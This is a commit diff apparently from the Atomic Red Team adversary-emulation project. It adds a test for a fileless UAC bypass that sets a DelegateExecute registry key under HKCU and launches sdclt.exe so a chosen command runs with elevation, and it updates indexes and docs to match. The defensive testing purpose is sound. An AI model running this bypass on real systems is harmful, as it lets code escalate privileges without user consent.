T1088 sdclt.exe UAC Bypass (#986)

* T1088 sdclt Fileless UAC Bypass

Adding simple sdclt uac bypass to Atomic.

* Generate docs from job=validate_atomics_generate_docs branch=T1088-UAC

Co-authored-by: CircleCI Atomic Red Team doc generator <email>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>

atomics/Indexes/Indexes-CSV/index.csv

@@ -96,6 +96,7 @@ defense-evasion,T1088,Bypass User Account Control,3,Bypass UAC using Fodhelper
 defense-evasion,T1088,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell
 defense-evasion,T1088,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell)
 defense-evasion,T1088,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories
+defense-evasion,T1088,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute
 defense-evasion,T1191,CMSTP,1,CMSTP Executing Remote Scriptlet
 defense-evasion,T1191,CMSTP,2,CMSTP Executing UAC Bypass
 defense-evasion,T1146,Clear Command History,1,Clear Bash history (rm)
@@ -290,6 +291,7 @@ privilege-escalation,T1088,Bypass User Account Control,3,Bypass UAC using Fodhel
 privilege-escalation,T1088,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell
 privilege-escalation,T1088,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell)
 privilege-escalation,T1088,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories
+privilege-escalation,T1088,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute
 privilege-escalation,T1038,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll
 privilege-escalation,T1519,Emond,1,Persistance with Event Monitor - emond
 privilege-escalation,T1044,File System Permissions Weakness,1,File System Permissions Weakness

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -8,6 +8,7 @@ defense-evasion,T1088,Bypass User Account Control,3,Bypass UAC using Fodhelper
 defense-evasion,T1088,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell
 defense-evasion,T1088,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell)
 defense-evasion,T1088,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories
+defense-evasion,T1088,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute
 defense-evasion,T1191,CMSTP,1,CMSTP Executing Remote Scriptlet
 defense-evasion,T1191,CMSTP,2,CMSTP Executing UAC Bypass
 defense-evasion,T1500,Compile After Delivery,1,Compile After Delivery using csc.exe
@@ -140,6 +141,7 @@ privilege-escalation,T1088,Bypass User Account Control,3,Bypass UAC using Fodhel
 privilege-escalation,T1088,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell
 privilege-escalation,T1088,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell)
 privilege-escalation,T1088,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories
+privilege-escalation,T1088,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute
 privilege-escalation,T1038,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll
 privilege-escalation,T1044,File System Permissions Weakness,1,File System Permissions Weakness
 privilege-escalation,T1179,Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages

atomics/Indexes/Indexes-Markdown/index.md

@@ -167,6 +167,7 @@
   - Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
   - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
   - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
+  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
 - [T1191 CMSTP](../../T1191/T1191.md)
   - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
   - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -437,6 +438,7 @@
   - Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
   - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
   - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
+  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
 - [T1038 DLL Search Order Hijacking](../../T1038/T1038.md)
   - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
 - T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -13,6 +13,7 @@
   - Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
   - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
   - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
+  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
 - [T1191 CMSTP](../../T1191/T1191.md)
   - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
   - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -209,6 +210,7 @@
   - Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
   - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
   - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
+  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
 - [T1038 DLL Search Order Hijacking](../../T1038/T1038.md)
   - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
 - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/Indexes/index.yaml

@@ -6074,6 +6074,30 @@ defense-evasion:
         cleanup_command: |
           rd "\\?\C:\Windows \" /S /Q >nul 2>nul
           del "c:\testbypass.exe" >nul 2>nul
+    - name: Bypass UAC using sdclt DelegateExecute
+      description: "Bypasses User Account Control using a fileless method, registry
+        only. \nUpon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\n[Reference
+        - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\nAdapted
+        from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        command.to.execute:
+          description: Command to execute
+          type: string
+          default: cmd.exe /c notepad.exe
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}'
+          New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
+          Start-Process -FilePath $env:windir\system32\sdclt.exe
+          Start-Sleep -s 3
+        cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse
+          -Force -ErrorAction Ignore
+
+'
   T1191:
     technique:
       x_mitre_data_sources:
@@ -14605,6 +14629,30 @@ privilege-escalation:
         cleanup_command: |
           rd "\\?\C:\Windows \" /S /Q >nul 2>nul
           del "c:\testbypass.exe" >nul 2>nul
+    - name: Bypass UAC using sdclt DelegateExecute
+      description: "Bypasses User Account Control using a fileless method, registry
+        only. \nUpon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\n[Reference
+        - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\nAdapted
+        from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        command.to.execute:
+          description: Command to execute
+          type: string
+          default: cmd.exe /c notepad.exe
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}'
+          New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
+          Start-Process -FilePath $env:windir\system32\sdclt.exe
+          Start-Sleep -s 3
+        cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse
+          -Force -ErrorAction Ignore
+
+'
   T1038:
     technique:
       x_mitre_permissions_required:

atomics/T1088/T1088.md

@@ -24,6 +24,8 @@ Another bypass is possible through some Lateral Movement techniques if credentia
 
 - [Atomic Test #6 - Bypass UAC by Mocking Trusted Directories](#atomic-test-6---bypass-uac-by-mocking-trusted-directories)
 
+- [Atomic Test #7 - Bypass UAC using sdclt DelegateExecute](#atomic-test-7---bypass-uac-using-sdclt-delegateexecute)
+
 
 <br/>
 
@@ -242,4 +244,43 @@ del "c:\testbypass.exe" >nul 2>nul
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #7 - Bypass UAC using sdclt DelegateExecute
+Bypasses User Account Control using a fileless method, registry only. 
+Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe
+[Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
+Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| command.to.execute | Command to execute | string | cmd.exe /c notepad.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}'
+New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
+Start-Process -FilePath $env:windir\system32\sdclt.exe
+Start-Sleep -s 3
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>

atomics/T1088/T1088.yaml

@@ -136,3 +136,29 @@ atomic_tests:
     cleanup_command: |
       rd "\\?\C:\Windows \" /S /Q >nul 2>nul
       del "c:\testbypass.exe" >nul 2>nul
+
+- name: Bypass UAC using sdclt DelegateExecute
+  description: |
+    Bypasses User Account Control using a fileless method, registry only. 
+    Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe
+    [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
+    Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)
+  supported_platforms:
+  - windows
+
+  input_arguments:
+    command.to.execute:
+      description: Command to execute
+      type: string
+      default: cmd.exe /c notepad.exe
+
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}'
+      New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
+      Start-Process -FilePath $env:windir\system32\sdclt.exe
+      Start-Sleep -s 3
+    cleanup_command: |
+      Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore